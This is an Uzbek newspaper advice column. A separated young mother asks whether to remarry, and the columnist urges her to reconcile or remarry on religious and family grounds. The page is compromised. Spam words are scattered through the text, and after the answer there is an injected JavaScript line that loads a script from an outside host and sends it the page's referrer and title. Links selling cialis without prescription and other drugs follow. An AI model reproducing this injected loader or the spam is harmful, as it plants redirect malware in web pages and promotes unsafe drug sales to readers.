Ўзингни рўзғорга тайёрла!

1Савол: — Ёшим 27 да. Отамнинг уйига қайтиб келганимга  уч йил бўлди. Битта қизим бор. Турмуш ўртоғимдан кўнглим қаттиқ ранжиган, аммо ҳали қонуний ажрашмаганмиз. Онам қизингга ота керак, қайта турмушга чиқ, дейди. Менинг эса кўнглим чопмайди, маслаҳат беринг. Buy

Жавоб: Buy — Мен шу ёшга киргунча анча-мунча турмушга чиқмаганлар билан ҳамсуҳбат бўлганман. Аммо ҳали бирортасидан «турмуш қурмай тўғри қилибман», деган гапни эшитганим йўқ. Жуфт бўлиб яшаш инсоният учун илоҳий топшириқ. Бажармасанг азият тортасан. Отанг ўтади, онангни ҳам сенга боғлаб қўймаган. Болаларинг ўз кўчасига кириб, ўз муаммоларига ўралашиб ке­тади, Яратган фақат жуфтингни манзилингнинг охиригача сенга пой­­лоқчи, қўрғон қилиб қўйган. Яхшими, ёмонми, ёнингдан жилмайдиган ўз-ўзингнинг томдошинг, суҳбатдошинг бўлганига нима етсин.

Сенинг ундан қаттиқ ранжишингга келсак, ёш билан, тажриба билан боғ­лиқ хатолар бор. Ки­ши ақли ўсса, тажрибаси ортса тузалади, афзаллашади. Уч йил бурунги ўзингнинг тутумларингни ўйла: ҳамма ишларинг тўғримиди? Тилингни тўғри бошқарганман деб ўйлайсанми? Сен атрофингга ёқиш учун қандай ҳаракатлар қилгансан? Ҳаммага ёқиб турган бўлсанг ҳам, сени ранжитдиларми? Ўзига ёқиб турган нарсани ҳеч ким ҳеч қачон ирғитиб юбормайди. Агар шундай қилган бўлса, у руҳий касал, ажрашиб тўғри қилибсан. Аммо уларга ёқа олмаган бўлсанг-чи?..

Қонуний ажрашмаганинг яхши бўлибди. Унинг ҳам бу ишни узил-кесил ҳал қилмагани дуруст аломат. Ақли кириб, сени та­розуга солиб, кўнгил узолмаётган бўлиши мумкин. Шартта ажрим қилмаганини узр сўраш ўр­нида ҳам қабул қилиш мумкин. Масаланинг энг муҳими, иккалангизнинг жон томиринггизни бирлаштириб турган — бо­ланг­нинг борлигидир! Майда-чуйда гинахонликларни унинг бошидан ўгириб ташлаш керак! Сен қаерда, жуфтинг қа­ерда яшашдан тўхтайсиз — худо билади, аммо иккалангизнинг умр­ларин­гизни сиздан сўрамай ҳам давом эттирувчи шу боланг бўлади! Шундай қиммат одамни етим қи­лишга иккалангнинг ҳам ҳаққинг йўқ!

Ўша йигит ақлан соғ­лом, етакласа одам бўладиган бўлса, ўзинг ҳам ўз камчиликларингни тан оладиган, меҳнатдан қочмайдиган, кибр ва худбинликдан ҳоли, тилингни, феълингни сабр билан ўнглашга кучинг етадиган бўлса, жуфтинг билан яраш. Ҳамма яхши нарсаларни бошидан бошла. Бу учовингиз учун ҳам саодатли йўл бўлади.

Аммо у йигитнинг ас­ли чатоқ бўлса, ажраш. Кейинги турмушинг кунлардан бир кун йўлга тушиб кетар, лекин боланг­нинг руҳан синиқ ўтиши бор нарса. Унинг кўнглини тинмай ўйлаб ўзинг ҳам ҳеч қачон яйраб яшолмайсан. Иккинчи турмушга қандай бўлсанг шундай ёндошолмайсан, ўзингни қайта ишлашинг керак. Бу эса устухонингни омбир билан бураш деган гап. Иккинчи турмушда тошни аввалгидан ҳам қаттиқроқ тишлашга тўғри келади. Шунга тайёр тур. Аммо эрга тегмай ўтиш, боланг билан онанг­нинг уйида яшаб ўтиш ундан ҳам оғриқлироқ! Аллоҳ инсонни  рўз­ғор билан овунтириб қўйган.  Кишининг ҳамма оғриқ ва армонларини оладиган — бу рўзғор! Албатта турмуш қур, қизим!s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + »; http://www.ukulele-smuk.com/?p=5851 Purchase cialis online without rx http://www.herrklubben.se/2018/02/02/buy-cheap-xalatan/

Шарҳлаш

 
Ўзингни рўзғорга тайёрла!

Савол: - Ёшим 27 да. Отамнинг уйига қайтиб келганимга ...

Ижара куёв машмашаси

Cheap Савол: - Дўстим шаҳарга келиб ўқишга кирди ва бир...

Азиз муштарийлар

Азиз муштарийлар, севимли газетангизда нималар ҳақида ўқишни истайсиз?...

Ҳозир сайтда

Сўровнома

Сайтимиз ҳақида фикрингиз?

Loading ... Loading ...
Бизнинг нашрлар